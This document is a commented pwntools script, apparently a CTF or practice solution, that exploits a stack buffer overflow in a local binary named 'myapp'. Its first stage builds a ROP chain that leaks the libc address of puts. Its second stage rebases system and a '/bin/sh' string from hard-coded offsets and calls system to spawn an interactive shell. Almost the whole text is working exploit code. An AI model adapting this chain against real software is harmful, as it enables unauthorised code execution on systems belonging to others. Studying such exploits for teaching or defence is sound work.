Untitled
from pwn import *
# Here we define the context of the exploit, it is for linux os and amd64 architecture
context(os='linux', arch='amd64')
# Fixed addresses inside the target binary, packed as 8-byte little-endian
# values because the amd64 stack holds 64-bit words.  Hard-coding them is
# only possible because the binary is loaded at a constant address, i.e. it
# appears to have been built without PIE -- TODO confirm with checksec.
put_plt_addr = p64(0x401030)    # puts@plt: prints the string rdi points at
put_got_addr = p64(0x404018)    # puts@got: holds the resolved libc address of puts
main_plt_addr = p64(0x401094)   # presumably main, used to get a second round of input
pop_rdi_gadget = p64(0x401090)  # presumably a `pop rdi; ret` gadget (sets the 1st argument)

# Stage 1: filler up to the saved return address, followed by a short ROP
# chain that makes the program print the runtime address of puts.  That 120
# bytes of filler reach the return address without the process aborting
# suggests there is no stack canary in this frame -- TODO confirm with checksec.
junk = 'A'*120
payload = junk
payload += pop_rdi_gadget   # rdi = address of puts@got
payload += put_got_addr
payload += put_plt_addr     # puts(&puts@got): leaks the libc address of puts
payload += main_plt_addr    # return to main so a second payload can be sent
#print(payload)

# Run the vulnerable binary locally; the prompt ending in "back?" is where
# it reads the untrusted input that overflows the stack buffer.
p = process("./myapp")
print(p.recvuntil("back?"))
#print(p.recv())
#print(p.recv())
#print(p.recv())
p.sendline(payload)
p.recvuntil("\n")
# The leaked pointer comes back as raw bytes; puts stops at the first NUL,
# so fewer than 8 bytes arrive and the value is right-padded with NULs to
# make a full 64-bit word.
leaked = p.recv()[:8].strip().ljust(8, "\x00")
log.success("Leaked Address = " +str(leaked))

leaked = u64(leaked)   # unpack the 8 bytes into an integer

# Offsets of puts, system and (presumably) a "/bin/sh" string inside the
# libc build the target links against.  They are specific to that one libc
# build; any other build makes the second stage land on wrong addresses.
puts_libc = 0x71910
system_libc = 0x449c0
sh_libc = 0x181519
# libc load base: ASLR shifts the whole library by one random delta, so a
# single leaked symbol is enough to rebase every other symbol.
offset = leaked - puts_libc
sys = p64(offset+system_libc)
sh = p64(offset+sh_libc)


# Stage 2: the same overflow, now calling system() with the rebased
# addresses (rdi = sh string, then return into system).
payload2 = junk
payload2 += pop_rdi_gadget
payload2 += sh
payload2 += sys


p.recvuntil("back?")
p.sendline(payload2)

p.interactive()   # hand the process's stdin/stdout over to the terminal